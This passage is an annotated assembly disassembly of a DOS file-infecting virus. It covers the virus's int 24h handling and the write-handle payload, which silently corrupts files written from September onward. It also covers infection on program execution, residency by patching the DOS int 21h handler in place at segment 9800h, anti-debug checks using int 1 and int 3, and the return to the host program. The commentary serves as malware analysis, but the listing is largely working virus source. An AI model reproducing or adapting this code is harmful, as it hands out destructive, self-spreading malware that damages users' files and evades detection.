	mov	word ptr es:[90h],355h	;offset l_16D5		;16FF 26: C7 06 0090 0355
	mov	es:[92h],ax		;int 24h segment := CS	;1706 26: A3 0092
	sti							;170A FB
	retn							;170B C3
s_16E6	endp
;================================================================
;	Restore int 24h vector
;----------------------------------------------------------------
;	Restore the int 24h vector saved in d_0362 (undo of s_16E6).
;	In:  d_0362 = saved offset,segment
;	Out: ES = 0
;	Clobbers: BX, flags
s_170C	proc	near
	cli							;170C FA
	xor	bx,bx						;170D 33 DB
	mov	es,bx						;170F 8E C3
	mov	bx,word ptr cs:[362h]				;1711 2E: 8B 1E 0362
	mov	es:[90h],bx					;1716 26: 89 1E 0090
	mov	bx,word ptr cs:[362h+2]				;171B 2E: 8B 1E 0364
	mov	es:[92h],bx					;1720 26: 89 1E 0092
	sti							;1725 FB
	retn							;1726 C3
s_170C	endp
;===============================================================
;	write handle service routine (destruction routine)
;---------------------------------------------------------------
;	Payload, run from the int 21h hook for every AH=40h (write handle).
;	In:  the caller's int 21h registers: BX = handle, DS:DX = buffer,
;	     CX = length; ES as the caller left it
;	Out: DX advanced by 0Ah when the payload fires, otherwise all
;	     registers unchanged
;	Fires when ALL of: ES != 8 (not one of the virus's own writes),
;	BX >= 4 (not the standard handles 0-3), and the current month
;	(DH from AH=2Ah) is >= 9.  Shifting DX by 10 makes DOS write the
;	bytes starting 10 past the caller's buffer, so every file written
;	from September onward is silently corrupted (and the last 10 bytes
;	read come from beyond the caller's buffer).
;	Clobbers: nothing beyond DX on the firing path; the AH=2Ah call's
;	results are discarded by the pops.
s_1727	proc	near
	push	ax						;1727 50
	push	bx						;1728 53
	push	cx						;1729 51
	push	dx						;172A 52
	push	es						;172B 06
	push	ds						;172C 1E
	push	si						;172D 56
	push	di						;172E 57
	mov	ax,es						;172F 8C C0
	cmp	ax,8						;1731 3D 0008
	je	l_1750		;-> virus contamination		;1734 74 1A
	cmp	bx,4						;1736 83 FB 04
	jb	l_1750		;-> BIOS			;1739 72 15
	mov	ah,2Ah		;get date, cx=year, dx=mon/day	;173B B4 2A
	int	21h						;173D CD 21
	cmp	dh,9		;september ?			;173F 80 FE 09
	jb	l_1750		;-> below			;1742 72 0C
				;<- payload: restore everything, then shift DX
	pop	di						;1744 5F
	pop	si						;1745 5E
	pop	ds						;1746 1F
	pop	es						;1747 07
	pop	dx						;1748 5A
	pop	cx						;1749 59
	pop	bx						;174A 5B
	pop	ax						;174B 58
	add	dx,0Ah		;shift buffer address		;174C 83 C2 0A
	retn							;174F C3
l_1750:	pop	di						;1750 5F
	pop	si						;1751 5E
	pop	ds						;1752 1F
	pop	es						;1753 07
	pop	dx						;1754 5A
	pop	cx						;1755 59
	pop	bx						;1756 5B
	pop	ax						;1757 58
	retn							;1758 C3
s_1727	endp
				;16 unused bytes between s_1727 and s_1769
	db	16 dup (0)		;not used		;1759 0010[00]
;================================================================
;	Load & Execute service routine
;----------------------------------------------------------------
;	Load & execute (AH=4Bh) hook: infect the program that is about to
;	be executed.
;	In:  the caller's int 21h registers; DS:DX = ASCIIZ program path
;	Out: all registers restored (the original AH=4Bh is then carried out
;	     by the chained DOS code at d_0428)
;	Copies 19h (25) bytes of the path into d_057F - longer paths are
;	truncated, shorter ones drag trailing bytes along; the ASCIIZ
;	terminator is whatever was copied.  Int 24h is hooked around the
;	infection so disk errors do not surface to the user.
s_1769	proc	near
	push	ax						;1769 50
	push	bx						;176A 53
	push	cx						;176B 51
	push	dx						;176C 52
	push	es						;176D 06
	push	ds						;176E 1E
	push	si						;176F 56
	push	di						;1770 57
	mov	si,dx			;file pathname		;1771 8B F2
	mov	ax,cs						;1773 8C C8
	mov	es,ax						;1775 8E C0
	mov	di,offset ds:[57Fh]	;l_18FF - victim name	;1777.BF 057F
	mov	cx,19h						;177A B9 0019
	rep	movsb			;copy victim name	;177D F3/ A4
	call	s_16E6			;Get int 24h vector (AX = CS);177F E8 FF64
	mov	ds,ax			;ds:=cs			;1782 8E D8
	call	s_13FD			;infect the file	;1784 E8 FC76
	call	s_170C			;Restore int 24h vector	;1787 E8 FF82
	pop	di						;178A 5F
	pop	si						;178B 5E
	pop	ds						;178C 1F
	pop	es						;178D 07
	pop	dx						;178E 5A
	pop	cx						;178F 59
	pop	bx						;1790 5B
	pop	ax						;1791 58
	retn							;1792 C3
s_1769	endp
;================================================================
;	New int 21h service routine
;----------------------------------------------------------------
				;<---- 10 bytes to identify resident virus
;	Resident int 21h entry.  Control arrives here via a 5-byte far jmp
;	that s_17BB patched INTO the DOS int 21h handler's code (the IVT
;	entry itself is untouched, see s_17BB).  The 10 bytes starting here
;	are what s_17BB compares against 9800:0413 to detect itself.
;	In:  the caller's int 21h registers
;	Out: falls into the re-executed DOS bytes at d_0428
;	Dispatch: AH = 40h -> s_1727 (payload), AH = 4Bh -> s_1769 (infect).
d_0413:	pushf							;1793 9C
	cmp	ah,40h		;write handle ?			;1794 80 FC 40
	jne	l_179F		;-> no				;1797 75 06
	call	s_1727		;write handle service routine	;1799 E8 FF8B
	jmp	short l_17A7					;179C EB 09
	nop							;179E 90
l_179F:	cmp	ah,4Bh		;Load & Execute ?		;179F 80 FC 4B
	jne	l_17A7		;-> no				;17A2 75 03
	call	s_1769		;Load & Execute service routine	;17A4 E8 FFC2
l_17A7:	popf							;17A7 9D
;================================================================
;   Execute substituted code and jump into old int 21h service
;----------------------------------------------------------------
					;<- four bytes from int 21h service
					;   d_0428..d_042A receive the original
					;   'cmp ah,imm8' (80 FC xx) and d_042B the
					;   original Jcc opcode; the displacement 05
					;   always goes to l_17B2.  Jump-taken case
					;   continues at d_049D:d_049F, fall-through
					;   at d_0547:d_0549 (both set by s_17BB).
d_0428:	cmp	ah,51h						;17A8 80 FC 51
d_042B:	je	l_17B2						;17AB 74 05
	jmp	dword ptr cs:[547h]				;17AD 2E: FF 2E 0547
l_17B2:	jmp	dword ptr cs:[49Dh]				;17B2 2E: FF 2E 049D
d_0437	dw	0000h,02A0h		;dword = code length (high word first, see 14AA);17B7 00 00 A0 02
;================================================================
;	Make virus resident
;----------------------------------------------------------------
;	Go resident.  Copies the 612h-byte virus image to the hard-coded
;	segment 9800h and then patches the DOS int 21h handler code in place:
;	it scans the first 80h bytes of the handler for a 'cmp ah,imm8 / Jcc'
;	pair (80 FC xx 7x yy), copies those bytes to d_0428/d_042B, records
;	the Jcc target in d_049D:d_049F and the fall-through address in
;	d_0547:d_0549, and overwrites the 5-byte pair with 'jmp far
;	9800:0413'.  The IVT entry for int 21h is left untouched, so a
;	vector comparison does not show the hook; the modified handler
;	bytes do.  No memory is allocated for 9800h - the virus simply
;	assumes that area is free.
;	In:  DS = virus segment; ES = 0 (IVT) - set by s_1948 before this
;	     routine is reached via s_1938 -> s_1925 -> s_1918
;	Out: nothing; exits early via l_181A if the 10 bytes at 9800:0413
;	     already match d_0413, or via l_1870 if no pattern is found
;	Clobbers: AX, BX, CX, DX, SI, DI, ES, flags; interrupts are
;	     disabled for the whole routine (cli ... sti)
s_17BB	proc	near
	cli				;disable interrupts	;17BB FA
	push	es						;17BC 06
	lea	si,cs:[413h]		;l_1793			;17BD 8D 36 0413
	mov	di,si						;17C1 8B FE
	mov	cx,9800h		;resident virus segment	;17C3 B9 9800
	mov	es,cx						;17C6 8E C1
	mov	cx,0Ah						;17C8 B9 000A
	repe	cmpsb			;10 bytes of d_0413 vs 9800:0413;17CB F3/ A6
	cmp	cx,0						;17CD 83 F9 00
	pop	es			;back to ES = 0 (IVT)	;17D0 07
	jz	l_181A			;-> already resident	;17D1 74 47
	mov	bx,es:[84h]		;int 21h - offset	;17D3 26: 8B 1E 0084
	mov	ax,es:[86h]		;int 21h - segment	;17D8 26: A1 0086
	mov	word ptr ds:[549h],ax	;l_18C9			;17DC A3 0549
	mov	word ptr ds:[49Fh],ax	;l_181F			;17DF A3 049F
	mov	di,bx						;17E2 8B FB
	mov	es,ax			;ES:DI = DOS int 21h handler;17E4 8E C0
	mov	cx,80h			;scan window = 128 bytes;17E6 B9 0080
	mov	al,80h						;17E9 B0 80
l_17EB:	repne	scasb			;find byte 80h		;17EB F2/ AE
	cmp	cx,0						;17ED 83 F9 00
	je	l_1870			;-> not found, EXIT	;17F0 74 7E
				;DI now points one past the 80h byte, so
				;DI-1 = 80h, DI = FCh, DI+1 = imm8, DI+2 = Jcc,
				;DI+3 = rel8
	cmp	byte ptr es:[di],0FCh				;17F2 26: 80 3D FC
	jne	l_17EB			;-> find another place	;17F6 75 F3
					;<- get four bytes from int 21h service
	mov	al,es:[di+2]					;17F8 26: 8A 45 02
	mov	byte ptr cs:[42Bh],al	;l_17AB			;17FC 2E: A2 042B
	mov	al,es:[di-1]					;1800 26: 8A 45 FF
	mov	byte ptr cs:[428h],al	;l_17A8			;1804 2E: A2 0428
	mov	al,es:[di]					;1808 26: 8A 05
	mov	byte ptr cs:[429h],al	;l_17A8+1		;180B 2E: A2 0429
	mov	al,es:[di+1]					;180F 26: 8A 45 01
	mov	byte ptr cs:[42Ah],al	;l_17A8+2		;1813 2E: A2 042A
	jmp	short l_1821					;1817 EB 08
	nop							;1819 90
					;<- already resident
l_181A:	jmp	short l_1870		;-> EXIT		;181A EB 54
	nop							;181C 90
d_049D	dw	140Dh			;address to jump1 into	;181D 0D 14
d_049F	dw	0278h			;old int 21h segment	;181F 78 02
				;<- Jcc target = (DI+4) + rel8, sign-corrected
				;   below when rel8 >= 80h (rel8 was zero-extended)
l_1821:	mov	ax,di						;1821 8B C7
	add	ax,4			;next to conditional jmp;1823 05 0004
	xor	bx,bx						;1826 33 DB
	mov	bl,es:[di+3]		;jump length		;1828 26: 8A 5D 03
	add	ax,bx			;jump address		;182C 03 C3
	mov	word ptr ds:[49Dh],ax	;l_181D			;182E A3 049D
	cmp	byte ptr es:[di+3],80h				;1831 26: 80 7D 03 80
	jb	l_183E			;-> forward jump	;1836 72 06
					;<- jump backwards
	sub	ax,100h			;minus carry		;1838 2D 0100
	mov	word ptr ds:[49Dh],ax	;l_181D			;183B A3 049D
l_183E:	add	di,4			;second condition addrs	;183E 83 C7 04
	mov	word ptr ds:[547h],di				;1841 89 3E 0547
	sub	di,5			;<- area to substitute	;1845 83 EF 05
	push	es			;keep handler address for the patch;1848 06
	push	di						;1849 57
	mov	dx,9800h		;resident virus segment	;184A BA 9800
	mov	word ptr cs:[4F5h],dx				;184D 2E: 89 16 04F5
	mov	es,dx						;1852 8E C2
	xor	si,si						;1854 33 F6
	xor	di,di						;1856 33 FF
	mov	cx,612h			;l_1380 -> l_1992	;1858 B9 0612
	rep	movsb			;copy virus code	;185B F3/ A4
				;<----- take control over int 21h
				;       d_04F2 = EA <413h> <9800h>, 5 bytes,
				;       written over the cmp/Jcc pair
	lea	cx,cs:[413h]		;offset l_1793		;185D 8D 0E 0413
	mov	word ptr ds:[4F3h],cx				;1861 89 0E 04F3
	pop	di						;1865 5F
	pop	es						;1866 07
	mov	cx,5						;1867 B9 0005
	lea	si,cs:[4F2h]		;offset l_1792		;186A 8D 36 04F2
	rep	movsb						;186E F3/ A4
l_1870:	sti							;1870 FB
	retn							;1871 C3
s_17BB	endp
			;<---- instruction pattern to write over int 21h code
					;<- the 5-byte patch: 'jmp far 9800:d_0413';
					;   d_04F3 is filled by s_17BB at 1861
d_04F2	db	0EAh			;JMP FAR 9800:l_1793	;1872 EA
d_04F3	dw	0			;:= offset l_1793	;1873 00 00
d_04F5	dw	9800h			;resident virus segment	;1875 00 98
;================================================
;		saved 32 victim bytes
;		(filled by s_13BF; the content below is whatever the
;		last victim's first 20h bytes were in this sample)
;------------------------------------------------
d_04F7	db	0E9h,0FFh,11h					;1877 E9 FF 11
	db	'Converted',0,0,0,0				;187A 43 6F 6E 76 65 72
								;1880 74 65 64 00 00 00 00
	db	'MZ'						;1887 4D 5A
	db	0EAh,01h,09h,00h,08h,00h			;1889 EA 01 09 00 08 00
	db	20h,00h,00h,00h,0FFh,0FFh			;188F 20 00 00 00 FF FF
	db	98h,00h						;1895 98 00 00
;-----------------------------------
	db	48 dup (0)		;not used		;1897 0030[00]
					;<- continuation addresses for the
					;   re-executed DOS bytes at d_0428
d_0547	dw	146Ch			;address to jump2 into (fall-through);18C7 6C 14
d_0549	dw	0278h			;old int 21h segment	;18C9 78 02
			;<------ code written to the file as paragraph padding
			;        (s_15C7 writes d_0343 bytes from here); the
			;        jmp displacement is set at 1599
	db	0E9h			;jmp l_18CF		;18CB E9
d_054C	dw	052Ch			;distance of jump	;18CC 2C 05
	db	0						;18CE 00
;================================================================
;	EXE virus entry
;----------------------------------------------------------------
;	Common entry for both file types (EXE: directly from the header IP or
;	via the padding jmp; COM: from l_0000 after the victim bytes were put
;	back).  Saves the registers the victim will need, runs the anti-debug
;	checks + installation (s_1938) and returns control to the victim.
;	In:  CS = virus segment; ES = PSP
;	Out: -> l_18E5 when d_0349 = FFh (COM), otherwise -> l_1953 (EXE)
l_18CF:	push	bx						;18CF 53
	push	cx						;18D0 51
	push	es						;18D1 06
	push	ds						;18D2 1E
	pushf							;18D3 9C
	mov	ax,cs						;18D4 8C C8
	mov	ds,ax						;18D6 8E D8
	call	s_1938			;make virus resident	;18D8 E8 005D
	cmp	byte ptr ds:[349h],0FFh	;l_16C9	(0FFh=COM)	;18DB 80 3E 0349 FF
	je	l_18E5						;18E0 74 03
	jmp	short l_1953		;-> EXE exit		;18E2 EB 6F
	nop							;18E4 90
;================================================================
;	End of virus code - file *.COM
;----------------------------------------------------------------
;	Hand control to a .COM victim: restore the saved registers, build
;	the far pointer PSP:0100h in d_05B4/d_05B6 (ES is the PSP segment
;	saved on entry) and jump to the restored victim code.
;	In:  stack as left by l_18CF
;	Out: never returns
l_18E5:	popf							;18E5 9D
	pop	ds						;18E6 1F
	pop	es						;18E7 07
	pop	cx						;18E8 59
	pop	bx						;18E9 5B
	mov	word ptr cs:[5B4h],100h	;l_1934 = victim IP	;18EA 2E: C7 06 05B4 0100
	mov	ax,es						;18F1 8C C0
	mov	word ptr cs:[5B6h],ax	;l_1936 = victim CS	;18F3 2E: A3 05B6
	call	s_16CA			;init registers		;18F7 E8 FDD0
	jmp	dword ptr cs:[5B4h]	;l_1934 -> run victim	;18FA 2E: FF 2E 05B4
					;<--- victim name: 19h-byte copy of the
					;     AH=4Bh path made by s_1769; the bytes
					;     after the first terminator are leftovers
					;     of earlier (longer) names
d_057F	db	'A:\SYS.COM'					;18FF 41 3A 5C 53 59 53
								;1905 2E 43 4F 4D
	db	0,'XE',0,'E',0					;1909 00 58 45 00 45 00
	db	9 dup (0)					;190F 0009[00]
;================================================================
;	ANTI-DEBUG - make virus resident
;----------------------------------------------------------------
;	Third anti-debug stage: s_17BB (go resident) is only called when AX
;	still holds the 3000h that s_1925 passed through the int 3 handler.
;	If a debugger changed AX, control jumps back into the int 3 loop at
;	l_1925, which then never terminates - the virus is not installed.
;	In:  AX as left by s_1925; ES = 0
;	Out: returns after s_17BB, or never returns
s_1918	proc	near
	cmp	ax,3000h					;1918 3D 3000
	jne	l_1925			;-> int 3		;191B 75 08
	call	s_17BB			;-> make virus resident	;191D E8 FE9B
	retn							;1920 C3
s_1918	endp
d_05A1	dw	 002Ah			;victim SS (rel)	;1921 2A 00
d_05A3	dw	 1388h			;victim SP		;1923 88 13
;================================================================
;	ANTI-DEBUG - call int 3 (Breakpoint)
;----------------------------------------------------------------
;	Second anti-debug stage: invoke the int 3 handler through its IVT
;	entry (ES = 0, vector at 0000:000Ch) with a far CALL instead of INT.
;	The pushed 3000h takes the place of the flags word that the
;	handler's IRET pops, so a plain handler returns here with AX intact;
;	a debugger's breakpoint handler that alters AX makes the loop spin.
;	In:  ES = 0 (set by s_1948)
;	Out: AX = 3000h on return; flags = 3000h after the IRET
s_1925	proc	near
l_1925:	mov	ax,3000h		;Flag register		;1925 B8 3000
	push	ax			;fake flags for the handler's IRET;1928 50
l_1929:	call	dword ptr es:[0Ch]	;int 3 (Breakpoint)	;1929 26: FF 1E 000C
	cmp	ax,3000h					;192E 3D 3000
	jne	l_1929						;1931 75 F6
	retn							;1933 C3
s_1925	endp
d_05B4	dw	 0000h			;victim IP		;1934 00 00
d_05B6	dw	 000Bh			;victim CS (rel)	;1936 0B 00
;================================================================
;	Make virus resident
;----------------------------------------------------------------
;	Anti-debug gate in front of installation.
;	Stage 1 (s_1948): call the int 1 (single-step) handler via its IVT
;	entry with AX = 0; a handler that returns AX != 0 is taken as a
;	debugger and installation is skipped.  Stage 2/3: s_1925 (int 3
;	probe) then s_1918 (compare + s_17BB).
;	In:  DS = virus segment
;	Out: ES = 0 and AX = 0 - there is no retn after l_1947, so control
;	     falls through into s_1948 and s_1938 returns through s_1948's
;	     retn after a second int 1 probe.  Callers restore ES from the
;	     stack afterwards (l_18E5 / l_1953).
;	Clobbers: AX, ES, flags (plus whatever s_17BB clobbers)
s_1938	proc	near
	push	es						;1938 06
	call	s_1948			;-> INT 1 (single step)	;1939 E8 000C
	cmp	ax,0						;193C 3D 0000
	jne	l_1947			;-> debugger suspected, do not install;193F 75 06
	call	s_1925			;-> INT 3 (Breakpoint)	;1941 E8 FFE1
	call	s_1918			;-> reside virus	;1944 E8 FFD1
l_1947:	pop	es						;1947 07
;================================================================
;	ANTI-DEBUG - call int 1 = Single Step
;	(also executed by fall-through from l_1947, see above)
;----------------------------------------------------------------
s_1948:	pushf			;flags for the handler's IRET	;1948 9C
	xor	ax,ax						;1949 33 C0
	mov	es,ax						;194B 8E C0
	call	dword ptr es:[4h]	;int 1			;194D 26: FF 1E 0004
	retn							;1952 C3
s_1938	endp
;================================================================
;	End of virus code - file *.EXE
;----------------------------------------------------------------
;	Hand control to an .EXE victim: restore the saved registers, then
;	rebuild the victim's original SS:SP and CS:IP from the header values
;	saved at infection time (d_05A1, d_05A3, d_05B6, d_05B4).
;	ES + 10h = load-module segment (the PSP is 100h bytes = 10h
;	paragraphs), which is the relocation value for the saved SS and CS.
;	In:  stack as left by l_18CF; ES = PSP
;	Out: never returns
;	Note: 'mov ss,bp' and 'mov sp,bp' are separated by a memory load;
;	the one-instruction interrupt shield after a write to SS does not
;	cover that gap, so an interrupt there would run on the new SS with
;	the old SP.
l_1953:	popf							;1953 9D
	pop	ds						;1954 1F
	pop	es						;1955 07
	pop	cx						;1956 59
	pop	bx						;1957 5B
	mov	ax,es						;1958 8C C0
	add	ax,10h			;relocating value	;195A 05 0010
	mov	dx,ax						;195D 8B D0
	mov	bp,word ptr cs:[5A1h]	;l_1921 = victim SS	;195F 2E: 8B 2E 05A1
	add	bp,ax						;1964 03 E8
	mov	ss,bp						;1966 8E D5
	mov	bp,word ptr cs:[5A3h]	;l_1923 = victim SP	;1968 2E: 8B 2E 05A3
	mov	sp,bp						;196D 8B E5
	mov	ax,dx						;196F 8B C2
	add	word ptr cs:[5B6h],ax	;l_1936 - CS relocation	;1971 2E: 01 06 05B6
	call	s_16CA			;init registers		;1976 E8 FD51
	jmp	dword ptr cs:[5B4h]	;-> run victim		;1979 2E: FF 2E 05B4
	db	20 dup (0)		;COM file stack		;197E 0014[00]
d_0612	label	byte			;end of the 612h-byte virus image;1992h
seg_a	ends
	end	start